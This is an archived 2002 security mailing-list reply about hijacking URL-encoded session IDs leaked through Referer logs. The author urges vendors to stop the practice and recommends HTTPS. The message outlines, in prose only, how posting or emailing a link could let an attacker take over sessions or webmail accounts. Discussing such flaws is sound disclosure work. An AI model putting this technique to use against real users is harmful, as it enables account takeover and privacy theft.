Hosting Provided By

Re: Hijacking URL Encoded Session IDs using Referer Logs

From: Bob Lee <crazybob(at)crazybob.org>
Date: Mon Nov 25 2002 - 09:32:49 EST

Many (most?) application servers use URL encoded session IDs when the user has disabled cookies. Many users disable cookies as a security precaution. There should be an advisory on this so that application server vendors stop allowing URL encoded session IDs by default.

If you can post an interesting link to a site, you can hijack the sessions of users with cookies disabled, and no one would be the wiser.

Does hotmail or yahoo use URL session IDs? E-mail someone a link to your site and hijack their e-mail account. In the scope of this attack, they'd have no way to tell that you stole it.

Also a good reason to use HTTPS.

Bob

On Monday, November 25, 2002, at 07:48 AM, zeno wrote:

> Not to my knowledge. I guess the question would be why would you store
Received on Mon Nov 25 09:59:47 2002

This message: [ Message body ]
Next message: Dawes, Rogan (ZA - Johannesburg): "RE: HTTP authentication and session timeout"
In reply to zeno: "Re: Hijacking URL Encoded Session IDs using Referer Logs"
Next in thread: Jeff Dafoe: "Re: Hijacking URL Encoded Session IDs using Referer Logs"
Reply: Jeff Dafoe: "Re: Hijacking URL Encoded Session IDs using Referer Logs"
Reply: zeno: "Re: Hijacking URL Encoded Session IDs using Referer Logs"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:44 EDT

Do you need help?